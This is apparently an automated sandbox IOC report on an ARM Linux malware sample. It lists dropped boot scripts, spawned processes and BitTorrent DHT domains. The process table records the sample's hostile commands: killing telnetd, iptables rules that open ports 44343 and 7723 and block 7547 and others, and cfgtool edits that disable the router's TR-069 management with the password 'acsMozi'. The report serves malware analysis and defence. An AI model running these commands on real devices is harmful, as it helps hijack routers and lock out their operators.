IOCReport

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| MGuvcs6Ocz | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped | initial sample | malicious |
| /etc/init.d/S95baby.sh | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/init.d/bootmisc.sh | ASCII text | dropped | malicious |
| /etc/init.d/checkfs.sh | ASCII text | dropped | malicious |
| /etc/init.d/checkroot-bootclean.sh | ASCII text | dropped | malicious |
| /etc/init.d/checkroot.sh | ASCII text | dropped | malicious |
| /etc/init.d/hostname.sh | ASCII text | dropped | malicious |
| /etc/init.d/hwclock.sh | ASCII text | dropped | malicious |
| /etc/init.d/mountall-bootclean.sh | ASCII text | dropped | malicious |
| /etc/init.d/mountall.sh | ASCII text | dropped | malicious |
| /etc/init.d/mountdevsubfs.sh | ASCII text | dropped | malicious |
| /etc/init.d/mountkernfs.sh | ASCII text | dropped | malicious |
| /etc/init.d/mountnfs-bootclean.sh | ASCII text | dropped | malicious |
| /etc/init.d/mountnfs.sh | ASCII text | dropped | malicious |
| /etc/init.d/umountnfs.sh | ASCII text | dropped | malicious |
| /etc/profile.d/Z97-byobu.sh | ASCII text | dropped | malicious |
| /etc/profile.d/apps-bin-path.sh | ASCII text | dropped | malicious |
| /etc/profile.d/bash_completion.sh | ASCII text | dropped | malicious |
| /etc/profile.d/cedilla-portuguese.sh | ASCII text | dropped | malicious |
| /etc/profile.d/vte-2.91.sh | ASCII text | dropped | malicious |
| /etc/rc.local | ASCII text | dropped | malicious |
| /etc/rcS.d/S95baby.sh | POSIX shell script, ASCII text executable | dropped | malicious |
| /usr/bin/gettext.sh | ASCII text | dropped | malicious |
| /usr/networks | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped | dropped | malicious |
| /usr/sbin/alsa-info.sh | ASCII text, with very long lines | dropped | malicious |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/MGuvcs6Ocz | /usr/bin/qemu-arm /tmp/MGuvcs6Ocz | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" | clean |
| /bin/sh | n/a | clean |
| /usr/bin/killall | killall -9 telnetd utelnetd scfgmgr | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT | clean |
| /sbin/iptables | n/a | clean |
| /sbin/modprobe | /sbin/modprobe ip_tables | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --dport 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --destination-port 58000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --source-port 58000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --dport 58000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --sport 58000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --destination-port 35000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --destination-port 50023 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --source-port 50023 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --source-port 35000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --destination-port 7547 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --source-port 7547 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --dport 35000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --dport 50023 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --sport 50023 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --sport 35000 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p tcp --dport 7547 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p tcp --sport 7547 -j DROP | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I INPUT -p udp --dport 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT | clean |
| /tmp/MGuvcs6Ocz | n/a | clean |
| /bin/sh | /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT" | clean |
| /bin/sh | n/a | clean |
| /sbin/iptables | iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT | clean |
| /sbin/upstart | n/a | clean |
| /bin/sh | /bin/sh -e /proc/self/fd/9 | clean |
| /bin/sh | n/a | clean |
| /bin/date | date | clean |
| /bin/sh | n/a | clean |
| /usr/share/apport/apport-checkreports | /usr/bin/python3 /usr/share/apport/apport-checkreports --system | clean |
| /sbin/upstart | n/a | clean |
| /bin/sh | /bin/sh -e /proc/self/fd/9 | clean |
| /bin/sh | n/a | clean |
| /bin/date | date | clean |
| /bin/sh | n/a | clean |
| /usr/share/apport/apport-gtk | /usr/bin/python3 /usr/share/apport/apport-gtk | clean |
| /sbin/upstart | n/a | clean |
| /bin/sh | /bin/sh -e /proc/self/fd/9 | clean |
| /bin/sh | n/a | clean |
| /bin/date | date | clean |
| /bin/sh | n/a | clean |
| /usr/share/apport/apport-gtk | /usr/bin/python3 /usr/share/apport/apport-gtk | clean |

URLs


Domains

| Name | IP | Malicious |
|---|---|---|
| dht.transmissionbt.com | 87.98.162.88 | clean |
| bttracker.acc.umu.se | 130.239.18.159 | clean |
| router.bittorrent.com | 67.215.246.10 | clean |
| router.utorrent.com | 82.221.103.244 | clean |
| bttracker.debian.org | unknown | clean |

IPs
